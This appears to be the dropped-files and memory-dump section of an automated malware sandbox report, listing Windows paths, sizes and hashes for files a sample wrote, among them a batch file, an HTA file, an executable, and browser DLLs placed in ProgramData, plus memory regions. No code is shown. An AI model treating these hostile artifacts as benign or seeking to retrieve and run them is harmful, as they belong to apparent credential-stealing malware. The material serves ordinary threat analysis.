C:\Users\Admin\AppData\Local\Temp\90CB.tmp\90CC.tmp\90CD.bat

Filesize
334B

MD5
3895cb9413357f87a88c047ae0d0bd40

SHA1
227404dd0f7d7d3ea9601eecd705effe052a6c91

SHA256
8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785

SHA512
a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\JMz1DFpdy.hta

Filesize
717B

MD5
8fc2c683a17caa5ed1b8df6bd40f4134

SHA1
086b15f805141c53320cedd4c1ed9f5f0fa1ab98

SHA256
bfa87608ad6083fd82744d8bc2a4ad9de2d9400f7334da2f78236669d140b0e6

SHA512
d34cfcff3578099d65c3f0ed8281a60c61705631296f296a007d835e5040d43bb9a195d011471a8078be22c48db785b94ceb531bf9b4d72fd8c086ae122fe796

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7788.tmp

Filesize
183KB

MD5
109cab5505f5e065b63d01361467a83b

SHA1
4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

SHA256
ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

SHA512
753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

Download Submit
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

Filesize
1.6MB

MD5
1dc908064451d5d79018241cea28bc2f

SHA1
f0d9a7d23603e9dd3974ab15400f5ad3938d657a

SHA256
d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454

SHA512
6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1fa1b7e9c8d580ecdc9387422457d27d

SHA1
88684a1edd076a2d19cbf809c6c178baf670fa82

SHA256
fe4d2fa83895797cf677a51ebd96fafdd0946357b0246d3a8a670f5c7b049e35

SHA512
5868e1242a311f9157dabfac9c0d3a1211834f9cfdad92134ffc35d194fb97dff0ac5b842f9432d6b8e1b1422937adc003292d6921089b23a1a290851d61d1e0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\78559949EC94W5DUPIQN.temp

Filesize
7KB

MD5
8e6e67f296e0de084a864dd54c3b2594

SHA1
e35200060fe48a8be4add5a016a7afd346be6f73

SHA256
5a895cc2f8a0586281a4d163e71f83e3433171cf24e5977b11d16fe58ba3fcd7

SHA512
e4a4b4fb8d2c0ffd42f706e638fee69a988629406b37dd153ab80f09dc2254f611008ef009514da97da6c47800f498e0c42e259925e8727655ec3ace98b4bf69

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UJ543I3E763J30K708PJ.temp

Filesize
7KB

MD5
ca5c0cb83897ba435fd1f0adc05fb3fe

SHA1
98edec4e4a62f68f189227b79538a20286b21eab

SHA256
f29cde81bd03dbc2640e610aa2fb27badc63ff1a1087e6df0eda537961c29485

SHA512
5e4ed49a9e3886894907e211718a6777db8b06ea43e7a246b2f8c6624d6acd96491747dd65a1e6957f2ecb29c5db6173ee91d6103d61c6520455f79c26bd5a7f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
10edf28039b9745d6da279e514a8d158

SHA1
7db4140db28ad478fb9614303768e72c5f1d03fe

SHA256
690a9000c6f0be735db508b7e2b9884e6d4db09780cb3b23c7afbdfd6b4f44cf

SHA512
a5c2abce67595e3515a9e8048b5b2f50d2bd51bf0de70f80c13868723b1b9721ea1be8356f06872b088ed8c5cd451c5ce4043347282a6fbcc98edcdc38250781

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\datareporting\glean\pending_pings\5710afc7-5ff0-4152-b403-21514f5016a8

Filesize
745B

MD5
23d7203ef162985d234f926790dfdd53

SHA1
e113770033be9ed9d8ea9e50d4a10b923b46dce4

SHA256
f329d23aab324ef4937f55a6cc7f9c93551411c861e81d98b3c83d827217c23c

SHA512
9a6a9541c1a7ee5d621f26a597012300c6e4055ddc5eebe43a92273f4812a779fb45662d1eee6c4ba1d4f35cbc2515ab33962bd0704abe596316353492b0afc4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\datareporting\glean\pending_pings\90d6a7aa-14eb-44d7-b484-3e379592533e

Filesize
11KB

MD5
262a574f25b9141db97af9915d5be6b5

SHA1
5aed675da187762fcdf9afe530a4abb5968ee680

SHA256
5393ad7e79a410f4a2a4256b6975240abc4e4d950b2d2bb603611b51e55c5e92

SHA512
fcf03319810312fbf18af5e710ee46c3a3828d16d336bbd4cdcc844fc53b9232c0eb61d52a352efd03c902c312dbf11b85f7a3a8dffeaee0f4e048bbefc242a9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\prefs-1.js

Filesize
6KB

MD5
7168cf407de28e78bc5971a67acaee5c

SHA1
a569316ce81d3abe91b6dc5ceadb38a87d5dfe9e

SHA256
d5963286344a3a2566471f39d2408d031db33deca4604f04c23e6420805159b8

SHA512
7f8c67e2b36f7fe2c7a66ac707c34acb534be882c538c04cb6b6773bce2ffbd1754b08efc86d7948fe25fc7f96ae5b6f359eff83fabf6ddd3338493430b83d5c

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\Users\Admin\AppData\Local\TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE

Filesize
1.8MB

MD5
11514677efdc49728bb951849b66217e

SHA1
f97f648487c3880e206a6f0aeaf8cbf65368992f

SHA256
309dcfe1a88c958d3f5bf4e41fd74e08df9acf9a34b54d45c01da8dc59eb55ff

SHA512
2dd09589d5484a0623ee03b3b0f4fb43e9025c6c58350b41839d77147f9aee59064d8ee64ded8dcad33c59ed551f240e12b0cd202d24c7467857576bff6a9516

Download Submit
memory/1308-959-0x0000000000400000-0x0000000000840000-memory.dmp

Filesize
4.2MB

Download
memory/1308-1068-0x0000000000400000-0x0000000000840000-memory.dmp

Filesize
4.2MB

Download
memory/1412-423-0x0000000006BF0000-0x00000000072EE000-memory.dmp

Filesize
7.0MB

Download
memory/1412-657-0x0000000006BF0000-0x000000000708B000-memory.dmp

Filesize
4.6MB

Download
memory/1412-553-0x0000000001340000-0x00000000017F4000-memory.dmp

Filesize
4.7MB

Download
memory/1412-495-0x0000000006BF0000-0x00000000072EE000-memory.dmp

Filesize
7.0MB

Download
memory/1412-29-0x0000000001340000-0x00000000017F4000-memory.dmp

Filesize
4.7MB

Download
memory/1412-659-0x0000000006BF0000-0x000000000708B000-memory.dmp

Filesize
4.6MB

Download
memory/1412-461-0x0000000001340000-0x00000000017F4000-memory.dmp

Filesize
4.7MB

Download
memory/1412-895-0x0000000006BF0000-0x000000000708B000-memory.dmp

Filesize
4.6MB

Download
memory/1412-63-0x0000000001340000-0x00000000017F4000-memory.dmp

Filesize
4.7MB

Download
memory/1412-101-0x0000000006BF0000-0x00000000072EE000-memory.dmp

Filesize
7.0MB

Download
memory/1412-103-0x0000000006BF0000-0x00000000072EE000-memory.dmp

Filesize
7.0MB

Download
memory/1412-126-0x0000000001340000-0x00000000017F4000-memory.dmp

Filesize
4.7MB

Download
memory/1412-359-0x0000000006BF0000-0x00000000072EE000-memory.dmp

Filesize
7.0MB

Download
memory/1412-367-0x0000000006BF0000-0x00000000072EE000-memory.dmp

Filesize
7.0MB

Download
memory/1412-813-0x0000000006BF0000-0x000000000708B000-memory.dmp

Filesize
4.6MB

Download
memory/1412-420-0x0000000006BF0000-0x00000000072EE000-memory.dmp

Filesize
7.0MB

Download
memory/1412-807-0x0000000001340000-0x00000000017F4000-memory.dmp

Filesize
4.7MB

Download
memory/1448-1659-0x0000000000160000-0x00000000001D8000-memory.dmp

Filesize
480KB

Download
memory/1552-876-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1552-868-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1552-870-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1552-874-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1552-878-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1552-872-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1552-866-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1848-718-0x0000000001220000-0x00000000016BB000-memory.dmp

Filesize
4.6MB

Download
memory/1848-658-0x0000000001220000-0x00000000016BB000-memory.dmp

Filesize
4.6MB

Download
memory/1996-529-0x0000000001150000-0x000000000184E000-memory.dmp

Filesize
7.0MB

Download
memory/1996-673-0x0000000001150000-0x000000000184E000-memory.dmp

Filesize
7.0MB

Download
memory/1996-530-0x0000000001150000-0x000000000184E000-memory.dmp

Filesize
7.0MB

Download
memory/1996-426-0x0000000001150000-0x000000000184E000-memory.dmp

Filesize
7.0MB

Download
memory/1996-1066-0x0000000001150000-0x000000000184E000-memory.dmp

Filesize
7.0MB

Download
memory/2084-120-0x0000000004160000-0x00000000045A0000-memory.dmp

Filesize
4.2MB

Download
memory/2084-121-0x0000000004160000-0x00000000045A0000-memory.dmp

Filesize
4.2MB

Download
memory/2084-424-0x0000000004160000-0x00000000045A0000-memory.dmp

Filesize
4.2MB

Download
memory/2156-53-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/2156-54-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2292-509-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2292-510-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Filesize
32KB

Download
memory/2308-61-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2308-60-0x000000001B500000-0x000000001B7E2000-memory.dmp

Filesize
2.9MB

Download
memory/2340-834-0x0000000000850000-0x00000000008B0000-memory.dmp

Filesize
384KB

Download
memory/2480-15-0x00000000012E0000-0x0000000001794000-memory.dmp

Filesize
4.7MB

Download
memory/2480-31-0x00000000012E0000-0x0000000001794000-memory.dmp

Filesize
4.7MB

Download
memory/2604-12-0x0000000006730000-0x0000000006BE4000-memory.dmp

Filesize
4.7MB

Download
memory/2604-14-0x0000000006730000-0x0000000006BE4000-memory.dmp

Filesize
4.7MB

Download
memory/2644-799-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2644-795-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2644-789-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2644-801-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2644-800-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2644-791-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2644-797-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2644-793-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2788-552-0x0000000000400000-0x0000000000840000-memory.dmp

Filesize
4.2MB

Download
memory/2788-460-0x0000000000400000-0x0000000000840000-memory.dmp

Filesize
4.2MB

Download
memory/2788-425-0x0000000000400000-0x0000000000840000-memory.dmp

Filesize
4.2MB

Download
memory/2788-122-0x0000000000400000-0x0000000000840000-memory.dmp

Filesize
4.2MB

Download
memory/2788-802-0x0000000000400000-0x0000000000840000-memory.dmp

Filesize
4.2MB

Download
memory/2788-1421-0x0000000000400000-0x0000000000840000-memory.dmp

Filesize
4.2MB

Download
memory/2844-516-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/3040-104-0x0000000001000000-0x00000000016FE000-memory.dmp

Filesize
7.0MB

Download
memory/3040-419-0x0000000001000000-0x00000000016FE000-memory.dmp

Filesize
7.0MB

Download
memory/3040-551-0x0000000001000000-0x00000000016FE000-memory.dmp

Filesize
7.0MB

Download
memory/3040-127-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/3040-459-0x0000000001000000-0x00000000016FE000-memory.dmp

Filesize
7.0MB

Download
memory/4068-3073-0x0000000001190000-0x00000000015EC000-memory.dmp

Filesize
4.4MB

Download
memory/4068-3074-0x0000000001190000-0x00000000015EC000-memory.dmp

Filesize
4.4MB

Download
memory/4072-783-0x0000000000CA0000-0x0000000000D10000-memory.dmp

Filesize
448KB

Download